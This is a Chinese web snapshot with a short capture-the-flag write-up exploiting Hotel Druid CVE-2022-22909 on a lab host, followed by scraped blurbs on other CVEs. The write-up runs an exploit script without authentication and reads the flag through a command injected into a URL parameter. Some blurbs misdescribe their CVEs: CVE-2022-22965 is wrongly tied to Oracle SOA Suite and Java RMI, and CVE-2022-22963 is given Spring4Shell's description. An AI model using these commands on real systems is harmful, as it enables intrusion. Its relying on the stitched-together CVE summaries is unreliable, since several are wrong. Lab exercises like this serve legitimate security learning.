添加链接
link之家
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。 所有渗透都需获取授权

前期准备工具

GitHub - 0z09e/CVE-2022-22909: Hotel Druid 3.0.3 Code Injection to Remote Code Execution

http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com

应用程序没有身份验证。运用该–noauth标志不履行身份验证。

python exploit.py -t http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com/ --noauth

读取flag

http://eci-2ze51ta3xlpb5h4hs28a.cloudeci1.ichunqiu.com/dati/selectappartamenti.php?1=cat%20../../../../../flag

成功获取flag

Apache Spark 命令注入( CVE - 2022 -33891)格式化文档 Apache Spark 命令注入( CVE - 2022 -33891)漏洞复现 CVE - 2022 -33891POC Apache Spark 命令注入( CVE - 2022 -33891)POC CVE - 2022 -33891 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 1.建议升级到 安全 版本,参考官网链接: https://spark.apache.org/downloads.html 2. 安全 设备路径添加黑名单或者增加WAF规则(临时方案)。
CVE - 2022 -22963 复现Demo,A Spring MVC or Spring Web Flux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
影响组件:org.springframework:spring-beans 影响版本:< 5.3.18 和 < 5.2.20.RELEASE 的Spring框架均存在该漏洞,建议用户尽快进行排查处置。 CVE -2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
CVE - 2022 -41040 Microsoft Exchange Server权限提升漏洞 和 CVE - 2022 -41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p443 <host>
内容概要:Spring framework 是Spring 里面的一个基础开源框架, 2022 年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring Web Flux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。此源码针对以上漏洞进行漏洞复现,亲测可用。 使用人群:使用于想要学习和了解该漏洞的 安全 从业者、大学生、以及其他用户。另外也适用于想要调试该漏洞的研究者。 其他说明:本源码使用pom搭建,需要下载maven工具。
2020年11月2日,Oracle官方发布了此 安全 警报针对Oracle Web Logic Server中的远程代码执行漏洞 CVE -2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络进行攻击。 建议大家及时将 Web logic 升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
漏洞产品: linux kernel - fsconfig syscall 影响版本: linux kernel 5.1-rc1 ~ 源码获取: apt source linux-image-unsigned-5.13.0-25-generic 或 https://mirrors.edge.kernel.org/pub/linu 一、Print Spooler 简介 Print Spooler是打印后台处理服务,即管理所有本地和⽹络打印队列及控制所有打印⼯作。如果此服务被停⽤,本地计算机上的打印将不可⽤。如果此服务被禁⽤,任何依赖于它的服务将⽆法启⽤,被⼴泛应⽤于本地和内⽹中! 二、漏洞简介 2021年6⽉29⽇, 安全 研究⼈员在GitHub上公开了 CVE -2021-1675 Windows Print Spooler远程代码执⾏漏洞的Po
CVE - 2022 -23131漏洞复测 1、漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在 安全 漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 2、漏洞复测
CVE - 2022 -22965是指一个严重的漏洞,其影响范围涉及官方Java应用程序和Oracle SOA Suite产品。这个漏洞可能允许未经授权的用户通过Java远程方法调用(RMI)攻击系统,或执行本地代码。攻击者可以利用这个漏洞来获取管理员权限、查看敏感信息或在系统上执行任意代码等。 解决这个漏洞的方法是尽快安装Oracle SOA Suite产品的补丁程序。在安装补丁程序之前,应该特别注意系统访问权限及相关 安全 设置,以确保系统 安全 性。此外,建议对Java RMI配置进行修改,使其只在授权的情况下可用。 总之, CVE - 2022 -22965漏洞的存在会给系统 安全 带来严重的威胁,因此需要尽快进行修复,以保证系统的正常运行和信息 安全